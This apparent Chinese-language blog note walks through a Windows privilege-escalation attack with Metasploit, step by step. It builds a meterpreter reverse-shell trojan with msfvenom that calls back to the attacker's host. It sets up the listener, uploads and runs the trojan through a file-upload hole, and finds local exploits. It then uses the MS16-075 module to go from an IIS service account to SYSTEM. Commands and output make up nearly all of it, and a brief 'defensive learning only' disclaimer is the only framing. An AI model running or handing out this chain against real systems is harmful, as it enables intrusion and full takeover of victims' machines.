【笔记】msf对Windows提权

前言

msf对Windows提权

本文仅用于网络信息防御学习

漏洞利用前提

  • 已经获取了WebShell权限,可以文件上传和远程命令执行

生成反弹Shell的木马

<ip_local>:攻击者IP地址 <port_local>:攻击者用于监听反弹Shell的端口号 -o x.exe:定义输出的文件

x86

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip_local> LPORT=<port_local> -f exe -o x.exe

x64

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip_local> LPORT=<port_local> -f exe -o x.exe

攻击者监听反弹Shell

1
2
3
4
5
6
msfconsole
msf > use exploit/multi/handler
msf expolit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf expolit(multi/handler) > set lhost 0.0.0.0
msf expolit(multi/handler) > set lport <port_local>
msf expolit(multi/handler) > exploit

受害者上线

  • 利用文件上传漏洞上传木马x.exe

  • 在受害者系统执行木马

1
.\x.exe
  • 成功上线后会获取反弹的Shell
1
meterpreter > getuid
1
Server username: IIS APPPOL\DefaultAppPool

提权

切换会话到后台

1
meterpreter > background

查看可以利用的漏洞编号

<id>:会话编号

1
2
3
msf > use post/windows/gather/enum_patches
msf (windows/gather/enum_patches) > set session <id>
msf (windows/gather/enum_patches) > run

直接筛选可以利用的模块

<id>:会话编号

1
2
3
4
msf > use post/multi/recon/local_exploit_suggester
msf (multi/recon/local_exploit_suggester) > set session <id>
msf (multi/recon/local_exploit_suggester) > set showdescription true
msf (multi/recon/local_exploit_suggester) > run
  • 返回的结果中为Yes的模块可以直接利用

利用模块为指定会话提权

<id>:会话编号

1
2
3
msf > use exploit/windows/local/ms16_075_reflection_juicy
msf (windows/local/ms16_075_reflection_juicy) > set session <id>
msf (windows/local/ms16_075_reflection_juicy) > run

切换到后台会话

1
2
meterpreter > session <id>
meterpreter > getuid
1
Server username: NT AUTHORITY\SYSTEM

完成